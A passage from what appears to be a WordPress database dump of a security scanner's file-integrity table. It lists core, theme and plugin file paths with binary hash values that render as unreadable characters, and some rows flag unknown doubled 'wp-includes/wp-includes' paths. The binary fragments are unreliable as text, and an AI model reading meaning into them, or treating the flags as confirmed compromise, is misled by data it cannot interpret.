�ܖݟr','',0,'?'),('�b�D!�W(�Œ�؉�','wp-content/themes/hitmag/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gOP҇�č�����','���~8 ir���\nPp��\n2�5�DahBzP','',0,'?'),('�t��пj��ZK�7 ]�','wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_2_optim.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��r!�9��{A','k��A�|�ԯ<�v�	!A7�\\�j�K�K�ذ��','',0,'?'),('�v>�8��\'��T6���X','wp-includes/js/jquery/ui/progressbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�١�����[	\"��','�([�flEQ�����8��q\ryھ���<y','',0,'?'),('��,��M��;v��','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+:�C�����g�Q','(�#���><���\"(\n��\'K������','',0,'?'),('��3�T.^�ƙ<���','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}����hR׼�tU�\\','^���k���~X8kg]��\0+jܝn���j�','',0,'?'),('��\'��@S �D���','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��?�q>�@���p','\0{aq�(w�!Iz�}+�l�x/I0�9|1%�����','',0,'?'),('���c<��F-�DDƸ�','wp-content/plugins/wp-cerber/assets/flags/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b!�i�k�Gq�����','*��E���N>���yT��Ri|M�Ӝ�H\Z�_�','',0,'?'),('���\09X�s�e�!�M�','wp-content/plugins/wordpress-seo/src/presenters/twitter/card-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l��P]��V?6ɸx','u��fFVMB�ӓ\Z��\\�~������a�c�','',0,'?'),('��EU��6ᥒ����C','wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-summary@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\Z$i5[�t��Ȑ�oO','�b,�x)�+��J5I�I�֕�m������','',0,'?'),('����?����7�B�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǜ�}ɠAxj,Әܷ','3�������j��@�A�1�)Σ�(^]CcD','',0,'?'),('��K���OȖ9�3|<�','wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ć�/֫RQ���','��	3�.�Bů~�kQ�\Zy���rzMFC�','',0,'?'),('�ߪ6��e?�u���','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-theme-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����*�A�mAC�:@','}c����m��e�>UP1�,>+�<��^H�\Z��','',0,'?'),('��M��{x�J�H��','wp-includes/blocks/pullquote/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�܃��]���<��j�','P>#i����P89i�J،�ֱ������X�y','',0,'?'),('��q�oT�;h^̀','wp-content/plugins/redirection/database/schema/232.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�W{�+N�s��-�','�m�k��ה\0�X��˝J�eO�L�΁vT��','',0,'?'),('��I���.$U0]\'�S_','wp-admin/includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߕ-�I�_�\'y�W','έd\"���^b\0�g��T�D7�B�k4�i��:�\\','',0,'?'),('��ꑉ}�Oa�T�TN.','wp-includes/blocks/search/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��旂�','�jV&�H\\Y�?-Ͽ;f�\0v�%���<Ir�','',0,'?'),('�����Z�\'�H,�K','wp-content/plugins/wp-fastest-cache/templates/exclude.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q�B����헅�','����_2^��^/�P���\"$6�*�5�J�\n','',0,'?'),('��+D�FܿTZ[H7','wp-admin/images/post-formats-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�l��H\\�������','e�t���w|W�{x�y%K:��QE7������','',0,'?'),('�\Z�[�M��[�\r�','wp-includes/blocks/columns/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��E�N����E�','m��M�+��l�k6��?.�����H�@b�','',0,'?'),('�#YН�����S�6','wp-content/plugins/wordpress-seo/css/dist/notifications-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ZcB���+','(�C�=�^�	�*2���+�t?Ӗ�x17&�\r','',0,'?'),('�/�q�7-!�to�쿋','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',0,'�y$�NX���l��l','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('�<�3�v��&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŝ*�7��P	rx��','�ô�p�`)��28�$iw6�J�g�jnD�j','',0,'?'),('�>��O���\'�𰩥�','wp-content/plugins/wordpress-seo/js/dist/languages/es.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0\'�\n���I۩��c�','����#ҪGn�N�v����6�TE�;��1{	','',0,'?'),('�?L�� ƹɷހi','wp-includes/wp-includes/customize/class-wp-customize-image-control.php',0,'j�f��	˥�^�К','j�f��	˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�A?�]\\8�PMT�l','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�B�)c��ae���','�[}���D���\0OV�:~-�\"~mBh\"<�pW�','',0,'?'),('�GV\\z��#���!;��','wp-includes/js/media-audiovideo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*EN�Q*Pj���� ','�Ť�J:nݟ�\0�I�ʘ\"eꀻ�2�����','',0,'?'),('�M��s�;\',���-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	���x��kr��\n�',':E\0?&�g%[U�V�p,W>\\�2�\Z:p�r�','',0,'?'),('�O�r#��T�G��!','wp-includes/js/swfobject.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�I}p�e~2�q�','?��Lw���.�4M��ՒF�J�>fI�鴆�','',0,'?'),('�Ry��i��N�Z�','wp-includes/wp-includes/js/dist/vendor/react.min.js',0,'�jB���e�}����\"\Z','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('�V�����#�L�ؙA','wp-includes/wp-includes/js/dist/primitives.min.js',0,'�>�1��~�i!�EKHK/','�>�1��~�i!�EKHK/','�S�R�8P���oa:@c���E~�|�Ji�','',0,'?'),('�l&�*������&','wp-includes/SimplePie/Content/Type/Sniffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JVP�t>%N����\0','\n��S/��̼#@��%���,�ul��$t���T��','',0,'?'),('�piQ�^�l�u�����J','wp-content/plugins/wordpress-seo/admin/class-plugin-availability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a7�)|�3}�n�[E','�B\\M�w+i���\\���y7�,�\'�-ß��','',0,'?'),('�v�\0���������','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php',0,'�q͊����tF����','�q͊����tF����','�,��Ca�� NÉ���vK�hWIQ�xk|�Q','',0,'?'),('���$(�g�(���P��/','wp-admin/css/wp-admin-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�Q5\'EY�o�0�}�_�','0�|TF����O 	�.�����.��>��CEj��','',0,'?'),('����z���ĎBF�S_','wp-includes/wp-includes/css/dist/nux/style-rtl.css',0,'�ip����8\0p���','�ip����8\0p���','���������3Bk~�x*N���K}�mǧ߸n�','',0,'?'),('��5��At߂�m0i�z�','wp-admin/css/themes-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	���#@+����hq�','��df\"��=��U�TQ&�t\"�95�B> kp�x','',0,'?'),('���yx����x4*� ','wp-content/plugins/wordfence/modules/login-security/views/user/grace-period-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BP����r�粓\0�','[f���v���AlԻ˄N�A:4QP�����	r','',0,'?'),('��H�С���YVhZ�','wp-includes/block-supports/duotone.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*l�-�1o�5GI�e','��-�t<BOB�!��g�\Z}�!���R���','',0,'?'),('���q�K�U�j�','wp-includes/SimplePie/Category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���[�� �ZVG�4&','�<��J�H�v�i�	b�4l~�e�F��mj�','',0,'?'),('��@��	0�|�����','wp-content/themes/hitmag/inc/kirki/modules/custom-sections/sections.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"8g×�_�|��q','h���&����$lZ�V��(D3v�^ڡ�;u�N','',0,'?'),('��O­\n	�U��Rb','wp-includes/Requests/Exception/HTTP/304.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�;��P�#S\Z�0|]�c','v��C���	a�\'F�;���z���(eJ��L','',0,'?'),('�ĺ���e㷐�t>','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�L����-\0��б','��v[F��,�l�_��\Z1��ه�U�5Ԭ]�','',0,'?'),('���3cv�N�\"��@�','wp-content/plugins/wordpress-seo/src/generators/schema/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ICjc�4}d/��X�<','(Ŋ}��*U=��)��\'�E<�z�W�+�|','',0,'?'),('��xƆ�xQ4Z��\0','wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-statistics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','衲z�o��<wek��Ta','1�}0���1��۞t\n\\��z��RTD$t�P8�>','',0,'?'),('��-Z���:E�:','wp-admin/js/image-edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oL�^,���a	\"�R ','2�܄��ٓ���^M�Y]�}��J��J��\'�z�Z','',0,'?'),('��`�\nl�����{�','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��^_=u�����',']H�\Zv7.��=I\\4��UA=`\\܍��Cc�繰�','',0,'?'),('���7����Rr˜�','wp-content/plugins/redirection/locale/json/redirection-de_DE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��<;=��?�	:�b','Y�	�^����Mӕ�k\n%�>���:pHS\0','',0,'?'),('�=��m��c���','wp-includes/wp-includes/class-wp-customize-widgets.php',0,'��,���^Oި�����','��,���^Oި�����','�K�WC�-�v�l�w� ��R\Z�xS)[R�','',0,'?'),('���|�jX����|�fb','wp-admin/css/login.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�L��;q���s\n','���������S���JIK��9�y��\rb','',0,'?'),('�%�W�R�u��w','wp-includes/blocks/comments-pagination/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��H��k�\"k��e','��LɦCj>i��-��\Z�2���7<��6�3�ߕ','',0,'?'),('�=v�\"��!1�p��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-cache-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d!��!X�4R����','�\rO��!W#�|�L\0��Z�K�0�@�S��O�','',0,'?'),('�MR��l�B�F�u','wp-includes/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���p���K���T','q�Ey_�b\'I^���V:=*�,��#��z','',0,'?'),('�NOD_�	T����=�','wp-content/plugins/wordpress-seo/css/dist/filter-explanation-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1+��RM�;�','�s�xX��Ϲ�|c���4��s�3x:��[','',0,'?'),('�Y�R3�������!','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E�\\*�l�K�\'�','=�ZI\Z屴U��\r�+q߼q��?�Ũ>�bAˡ$','',0,'?'),('�^/b��/�8K�O�Q','wp-content/plugins/wordpress-seo/js/dist/structured-data-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�:��g��bQ8�','8�Jo���R�m��3�XL��1~e��z','',0,'?'),('�he��-�BJ��_v�','wp-includes/blocks/search/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�tp{�&<웑6�1��','\n�� #8���ޗF����ӳl��䇗7�;�','',0,'?'),('�j�eL=\Z�s��4�k�+','wp-content/plugins/wordpress-seo/js/dist/editor-modules.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@<N&o���=B','\'�1��N&�T�o+���M�8ɾdJr^z��','',0,'?'),('�n���>EP�@	;�k�','wp-includes/wp-includes/customize/class-wp-customize-filter-setting.php',0,'M��`f��\0�iu�','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w��	���','',0,'?'),('�r�\\�j�����A$�','wp-includes/js/customize-base.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Nf�u�\Z\\A��0o�)','���l��us�o	��n�Gǝ��NU1�`9.�','',0,'?'),('�{�r�p7����>]�','wp-includes/blocks/post-comments-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��Ã	�ǸG�T�','n���/|:�˵�I���\\F}7����<����','',0,'?'),('�\rrƹϘ菳�����','wp-includes/wp-includes/js/jquery/ui/spinner.min.js',0,'0�������<8z�+','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('���E��(Ϊ=����','wp-includes/wp-includes/customize/class-wp-customize-sidebar-section.php',0,'Vj��B���ر���q','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('��犏`bI�\"v4�N�','wp-includes/blocks/cover/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d:~��O)g�RH�','F��@��ݒ7]���@\Z:b\"Cc��o�','',0,'?'),('�����\"Sέ`t@','wp-admin/network/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R\n��.o���Ʊ2bw','�A�gp����/�m��,&Rq�f9ey��$=�','',0,'?'),('��K?�r��a#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ia����Rɞ%x��','���M�� �b����d�]F�i�POZq��','',0,'?'),('���\\��.1��-��:','wp-admin/options-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�ã�n�}�Eq�}PD','g\\,�� iIc<��^*l��]�E1��i>�','',0,'?'),('��ΝH�*��*.ځS','wp-admin/includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�)?�H�Q�瑆','7xҢ�#����Z�X�K	Hj8�G F^:y؁N','',0,'?'),('��8��p>�ĉ�+(�','wp-includes/blocks/template-part/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',f4b��L�U�Y0�A�','�;MDmWl]8�����\nYŸ���!��\0�','',0,'?'),('��]y����}���8�','wp-content/plugins/wordpress-seo/images/news_plugin_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��1J/��G�}@�','/���_Ju��u�9ךI� ��[?a���0�Y�','',0,'?'),('����\0��+؆����','wp-includes/wp-includes/class-wp-ajax-response.php',0,'o6�)�Q�\"Sσt�.H�','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('��dx���eB�ݙϟ5','wp-includes/IXR/class-IXR-clientmulticall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���q�g��l�t','��ғ\'bO����E�&ƧW0h�	o�\\`��Y��','',0,'?'),('��Ќ6���xe��<aԦ','wp-content/plugins/wp-cerber/assets/flags/ki.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�F=��t���h�','=aQ���DA�}�)�D_tc�f�H�~X����','',0,'?'),('��Ul1�ȕD�bmg�','wp-includes/css/buttons-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('���Ϗ��RCOh����','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��6��.tz��x�o','��;���p^\0��3�Թ�(� ��A���a���w','',0,'?'),('���h���	�i�8.','wp-includes/blocks/post-comments-form/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��;�7&>�Y��','�Q����e�}�s$rր�86�Nܼ�G/4\\','',0,'?'),('�\nfv�8���1���-I','wp-includes/SimplePie/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('�)�яs�Rm�U����','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-validate-data-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#v�\0��W��k��yg','�O�I��0��EVzQʄ���ݬ�ry��ȑ�`w�','',0,'?'),('�+)B�ϖ>�ڇD�','wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-summary.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��oK�ZO�����o','�Z����f�m�ͯ��h�K��8k~$��f�7/��','',0,'?'),('�@ր�D�8�f�ٶ\r','wp-content/plugins/wp-smushit/app/views/dashboard/webp/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3���x-�G�','�7�]�E��Y�j�Pz��l�s蒓}���?w','',0,'?'),('�F�[��㵋Pѳ�@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�b�P\"��x�Y@0��','�\'���n��*2nԋ����)�a(�_�Iq�ɘ{','',0,'?'),('�O�\0�Q,�N 4$�N��','wp-content/plugins/redirection/redirection-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�މƬ�K�6�7ym��','^�V�m;V�F��P���O^ĥ��Ga�|\r�','',0,'?'),('�`�`\'�l`=��X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J*E�%v	N�a!��Uw','M��#3�a@xh���s\r5qB�N٣�X#��','',0,'?'),('�y��ё�c�j!�\\\'','wp-includes/class-wp-block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�v�SEf���6�W','L������lΚ��׿��k��2��:����','',0,'?'),('�{�Bv[qc�2�9x�','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Output/QROutputAbstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oY��kR������^','�ύ��ˏ��������\\�a���!��I�.N','',0,'?'),('�2�D[\"��*\"(��','wp-includes/js/jquery/ui/effect-size.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','os%|�lR�9��$�\'','���êg�����]8R��W\Z�C�@�=�','',0,'?'),('����L���j2�­','wp-includes/wp-includes/js/dist/notices.js',0,'m����5��F2�c�:į','m����5��F2�c�:į','�d��P��\'���Z8������ϭd�%9���AN','',0,'?'),('��hJ��D�㰗G� �n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','耳��B/�X�\n`�2r','��>C��]�!��կVMՍ�4U��U����\Z','',0,'?'),('��\\���0O�\'w[l/^$','wp-includes/blocks/gallery/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�C�7\Z�ZlK�','��\Z��yF����;N,ō���ęh����W','',0,'?'),('���ZQ4��\\(�܇','wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r��&Z3�r�\"�','�:��%�;Ki�W@>�U;������#�>','',0,'?'),('��x��Ϡ��\Z�P�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',0,'�w��ͱ��r0��؅=�','�w��ͱ��r0��؅=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('��WP[{\' *��\r�ɗ','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�ɶ��z^��ͅ�B�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/MessageTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r��F�y0��J2��','W%�v�Зc��2՞��v�zݺu9��E','',0,'?'),('�˦�����]�ɬ��','wp-includes/wp-includes/js/dist/vendor/lodash.min.js',0,'�:)DnBC���9��','�:)DnBC���9��','�-�1,�O�\"y�I띎�N�WI�#nKk\0:�','',0,'?'),('��[0��^������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�mg�ݜ|�<뼸Dh','�+��%�G�<t�1]�I�5m�\Z�}��E�>�;','',0,'?'),('���cΧ�?5���}w�','wp-includes/wp-includes/js/codemirror/codemirror.min.js',0,'��	�f��h�;f�q�','��	�f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('��yk6�T��d�+�ˎD','wp-content/plugins/wp-smushit/app/views/tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9YgseOU	�,/','�gG�? P�R�mW���kM�!��~`{S8#7?�','',0,'?'),('��`�1Ot��\0?s��','wp-content/plugins/wp-smushit/app/assets/js/smush-global.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�|���=��Dw�\r�','L���7iG�dS�G�rc\0⫠�6�F����','',0,'?'),('��/�؊!�N>�\n�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f<_2S^I��Z','��iݯ��8{��i���q!d���Ս��Az�','',0,'?'),('����3q��s}2 ��','wp-content/plugins/wp-cerber/assets/flags/za.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S&�:sa�J��d����','�~����S��缫F��E�9c4|�+�J�z','',0,'?'),('��\Zl`e4�C45��','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-group-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kq$(�F�r��','�ZI��8̖�C�\"��\0��6�JF�a��u��^','',0,'?'),('�Km�M�����oч�','wp-content/plugins/wordpress-seo/src/integrations/front-end-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�-��|\0:ѣ�Owv�','y$���@7�s)\0�L� ����Z�-��','',0,'?'),('�\Z���l���3Ȋ�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�UՒ�JL��m8`v','ӛ�vQ��k��\n��l�]�`Ε��۷�+}�kO�','',0,'?'),('�*�6V|Lj�v����','wp-content/plugins/wordpress-seo/src/routes/configuration-workout-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IH��\0	���έ�g��','�H�+�%%�O���	\\�>a|:��62�I','',0,'?'),('�-8�1�Vp#e�M8','wp-content/plugins/wp-smushit/app/views/dashboard/lazy-load-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�+g������b�','�,����l\Z�qd\Z�G���\\˫�(b��2�','',0,'?'),('�<h�iѭ3*�	Fq','wp-includes/blocks/button/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�.��U�1����','�\'�Sңx~�� d����a:h]?����ݙƋ�','',0,'?'),('�@��d�,��I �օ','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JԵ�/��M�z<�w�u','���dh~hĥ���W9&(�(��O\r0^1F)� �~N','',0,'?'),('�J|6}�P�,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�n�g� �6K�.p�_','�����miX@Cb\\�cJ	q�Q��s�M��!è�','',0,'?'),('�O�~�ZA8�6��}��','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/OptionProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�@h+6��5�J�N�','hVFJ���ls+�\0<������F�.���/�*w�L','',0,'?'),('�U�~\n�SM:�r�� �D','wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php',0,'�\\������:R/�+','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('�\\O�hq��2���.�','wp-content/plugins/wp-cerber/assets/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I:�L�b��0Յ:�','�$}-ȵ�ύ��5ז��\n�\rO�Ec�[V','',0,'?'),('�d`#)?�ϳ��0(w��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oY���-�)EHd','l�,8�E�T��C�eyl�a�S��;)\'\"d�`z��','',0,'?'),('�j���\\�غ��&','wp-includes/wp-includes/class-wp-query.php',0,'\'\'\'��UQ�|4��','\'\'\'��UQ�|4��','F�7��������S�1�\Z�`#�4�\rHsL\n','',0,'?'),('�j�1=���d��/;','wp-content/plugins/wordpress-seo/src/services/health-check/health-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}͘�i}��z?���V','�����q��8��y�Լ}ũ�[��b$�','',0,'?'),('�qOF����G�P*�','wp-includes/wp-includes/js/jquery/ui/effect-slide.js',0,'��a�d��{2װ�','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('�=Uq(m�B.�BЧ','wp-content/plugins/wordpress-seo/src/services/importing/aioseo/aioseo-replacevar-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�a�9�ee����','�r�p]	’�#]7���W*�;EmC��d�','',0,'?'),('�����V�Z�bl�ͯ','wp-includes/blocks/archives/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʡ<�e$��\n��','Wxث�7qC\n������g�\Z�e��6-&','',0,'?'),('��x�`�f,5ef2��','wp-admin/js/site-health.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0T�\Zж�д3F��','i�#t�mjsZ\"�4Y����s3�b����!kP','',0,'?'),('��d�]�&3���N�=','wp-content/plugins/wordfence/images/logos/shield-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dX�#�p�RðJ�','��L�O�\'�(�EqH��l�@��)O����','',0,'?'),('��ʳ��2�_�R�8�3h','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/AlphaNum.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ks��~��q�','V�6oy�o�����NL������\"��R','',0,'?'),('�����[��:�����q','wp-admin/includes/class-wp-plugins-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Z���W���l͘�','4\r9���\0�ۚ������^i��A[\"^��n͓','',0,'?'),('���P�Of;���/��','wp-includes/SimplePie/Decode/HTML/Entities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jыp&y������U','��WP��*P=Nϻ;\Z���i��8��2�_��� ','',0,'?'),('��MGypQ�M/g�!�','wp-includes/wp-includes/js/jquery/ui/sortable.js',0,'�kX���E�EL�&�','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('������dN����h�,','wp-content/plugins/redirection/models/monitor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�K}��	�(.6`P�','t����a�?j�u�k. p��<	